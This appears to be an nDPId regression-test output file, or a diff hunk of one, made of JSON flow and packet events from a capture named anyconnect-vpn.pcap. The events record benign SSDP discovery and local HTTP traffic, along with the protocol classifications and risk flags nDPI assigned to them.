00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268077,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA45bY75ACCk+7SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
@@ -274,16 +274,16 @@
00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}}
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="}
